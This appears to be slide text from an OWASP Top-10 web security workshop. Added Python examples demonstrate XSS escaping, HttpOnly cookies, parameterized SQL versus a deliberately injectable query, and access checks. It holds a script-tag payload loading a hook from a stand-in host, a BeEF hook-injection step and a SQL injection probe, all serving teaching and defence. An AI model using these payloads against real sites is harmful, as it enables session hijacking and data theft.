7. OWASP Top-10
• Injection
• Broken Auth and Session Management
• XSS
• Insecure Direct Object References
• Security misconfiguration
• Sensitive Data Exposure
• Missing Function Level Control
• CSRF
• Using Known Vulnerable Components
• Unvalidated Redirects and Forwards
8. OWASP is GOOD!
Hackers
• Methodologies for how to hack
Developers
• Methodologies for how to implement things securely and how to fix them
Testers
• The same things that hackers use
• Methodologies for how to test the security of their projects
10. Rules
• Either follow the scenario with me or try to find 10 vulnerabilities by yourself.
• No scanners (DDoS alert).
• Do not attack infrastructure. Only web application vulnerabilities here.
• Do not attack people around you.
• No punching.
13. XSS + Broken Authentication
Cross-Site Scripting
Supply JS code instead of valid data; the browser then processes the code as part of the page.
Broken Auth
Session management flaws (in our case the HttpOnly flag is missing on the session cookie, so injected script can read it).
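The two defences this slide points at, as an added example written for this page (it is not code from the slides or from the hole-blog project): untrusted data is output-encoded before it lands in HTML, so supplied JS is rendered as text rather than run, and the session cookie is issued with HttpOnly (plus Secure and SameSite), so a script that does get in cannot read it from document.cookie. A small review helper reports which flags a raw Set-Cookie value lacks. The comment body and the hook URL are constructed sample input.

```python
"""Added example (not from the slides or the hole-blog project): output
encoding for reflected data and a session cookie with the HttpOnly flag,
using only Python's standard library."""
from html import escape
from http.cookies import SimpleCookie


def render_comment(author: str, body: str) -> str:
    # Every untrusted value is escaped for an HTML text context before it is
    # placed into the page; the surrounding markup is fixed template text.
    return f"<p><b>{escape(author, quote=True)}</b>: {escape(body, quote=True)}</p>"


def session_cookie_header(session_id: str) -> str:
    # Build the Set-Cookie value for the session identifier with the flags a
    # session cookie should carry. HttpOnly hides it from document.cookie.
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def missing_cookie_flags(set_cookie_value: str) -> list:
    # Review helper: given a raw Set-Cookie header value (as seen in a proxy
    # or in response logs), report which protective attributes are absent.
    attrs = {part.strip().split("=", 1)[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    wanted = ["httponly", "secure", "samesite"]
    return [a for a in wanted if a not in attrs]


# Constructed sample input: a comment body carrying a script tag instead of
# valid text, which is the XSS pattern described on the slide.
SAMPLE_AUTHOR = "guest"
SAMPLE_BODY = '<script src="http://hook.example/hook.js"></script>'

if __name__ == "__main__":
    print(render_comment(SAMPLE_AUTHOR, SAMPLE_BODY))
    print(session_cookie_header("s3ss10n-id-constructed"))
    print(missing_cookie_flags("session=abc; Path=/"))
```

Escaping is context-specific: `html.escape` is right for text and quoted attribute values, but data placed inside a script block or a URL needs the encoding for that context instead.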
14. BeEF
Inject this script into the website:
<script src="<url to the hook>" type="text/javascript"/>
15. SQLi + Security Misconfiguration + Sensitive Data Exposure
SQL injection
Supply SQL operators and statements instead of valid data; the server then processes them as part of its SQL queries (not as strings).
Security misconfiguration
Crypto misuse, wrong DB configuration, etc.
Sensitive Data Exposure
Leakage of critical information.
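The slide's point about data versus statements, as an added example for this page (not code from the slides or from the hole-blog project), run against an in-memory SQLite database so it works offline. `find_user_vulnerable` pastes the supplied value into the query text, so SQL operators in the input become part of the statement; `find_user_safe` binds it as a parameter, so the database always receives it as a string. The user table stores salted PBKDF2 hashes rather than clear-text passwords, which is the slide's other point about crypto misuse and sensitive data exposure. The table, user names and passwords are constructed sample data.

```python
"""Added example (not from the slides or the hole-blog project): SQL
injection via string concatenation beside the parameterized form, plus
password hashing instead of clear-text storage."""
import hashlib
import hmac
import os
import sqlite3


def pbkdf2(password: str, salt: bytes) -> bytes:
    # Slow, salted hash; the stored value cannot be turned back into the password.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    # Constructed sample data: two users with a random per-user salt each.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (name TEXT, salt BLOB, pw_hash BLOB, is_admin INTEGER)"
    )
    for name, password, admin in [("admin", "constructed-admin-pw", 1),
                                  ("bob", "constructed-bob-pw", 0)]:
        salt = os.urandom(16)
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
                     (name, salt, pbkdf2(password, salt), admin))
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Vulnerable: the username is concatenated into the SQL text, so a quote
    # in the input closes the string literal and the rest is parsed as SQL.
    query = "SELECT name, is_admin FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    # Hardened: the username is a bound parameter; the statement text never
    # changes, whatever the input contains.
    return conn.execute(
        "SELECT name, is_admin FROM users WHERE name = ?", (name,)
    ).fetchall()


def check_login(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Parameterized lookup plus constant-time comparison of the hashes.
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE name = ?", (name,)
    ).fetchone()
    if row is None:
        return False
    salt, stored = row
    return hmac.compare_digest(pbkdf2(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1"  # the classic operator-instead-of-data input
    print("vulnerable:", find_user_vulnerable(db, probe))
    print("safe:      ", find_user_safe(db, probe))
    print("login bob: ", check_login(db, "bob", "constructed-bob-pw"))
```

The same `?` placeholders (or the driver's named equivalent) are the fix for every database; escaping quotes by hand is not, because it has to be right for every dialect and every context in which the value is used.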
16. Everything else …
Insecure Direct Object Reference
Access a file you have no permission to read.
Missing Function Level Control
Access to a restricted (sensitive) function.
Using Components with Known Vulnerabilities
Vulnerable OS, libraries, frameworks, CMS, algorithms, etc.
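The two missing checks behind Insecure Direct Object Reference and Missing Function Level Control, as an added example for this page (not code from the slides or from the hole-blog project), in a small blog-like model: a record fetched by id is released only after an ownership check (object level), and a sensitive function refuses callers without the required role (function level), with the check attached to the function rather than to the link that leads to it. The users, roles and drafts are constructed sample data.

```python
"""Added example (not from the slides or the hole-blog project): an
object-level authorization check against IDOR and a function-level role
check against missing function level control."""
from dataclasses import dataclass
from functools import wraps


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the action."""


@dataclass(frozen=True)
class User:
    name: str
    role: str  # "admin" or "user"


@dataclass(frozen=True)
class Draft:
    draft_id: int
    owner: str
    text: str


# Constructed sample data: unpublished drafts belonging to two different users.
DRAFTS = {
    1: Draft(1, "alice", "alice's unpublished post"),
    2: Draft(2, "bob", "bob's unpublished post"),
}


def get_draft(current: User, draft_id: int) -> Draft:
    # Object-level check: looking the record up by id is not enough; it must
    # belong to the caller, or the caller must be an admin. Unknown ids and
    # other users' ids get the same answer, so ids cannot be enumerated
    # through differing error messages.
    draft = DRAFTS.get(draft_id)
    if draft is None or (draft.owner != current.name and current.role != "admin"):
        raise Forbidden(f"{current.name} may not read draft {draft_id}")
    return draft


def require_role(role: str):
    # Function-level check as a decorator: the check lives with the function,
    # so hiding the menu entry in the UI is not what protects it.
    def decorator(fn):
        @wraps(fn)
        def wrapper(current: User, *args, **kwargs):
            if current.role != role:
                raise Forbidden(f"{fn.__name__} requires role {role!r}")
            return fn(current, *args, **kwargs)
        return wrapper
    return decorator


@require_role("admin")
def delete_user(current: User, name: str) -> str:
    # Sensitive function: only reachable with the admin role.
    return f"{name} deleted by {current.name}"


def allowed(fn, *args) -> bool:
    # Small helper: True if the call goes through, False if it is Forbidden.
    try:
        fn(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    alice = User("alice", "user")
    root = User("root", "admin")
    print(get_draft(alice, 1).text)
    print("alice reads bob's draft:", allowed(get_draft, alice, 2))
    print("alice deletes bob:", allowed(delete_user, alice, "bob"))
    print(delete_user(root, "bob"))
```

In a real application the same two checks sit in the request handlers: the object-level check where a record is loaded by an id taken from the URL, the function-level check on every privileged route, independent of whether the UI shows a link to it.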
17. What to do next?
• Try it by yourself: https://github.com/Varyagovich/hole-blog
• Try to fix the project
• Use OWASP projects (attack/prevention cheat sheets and tools)
• Contribute!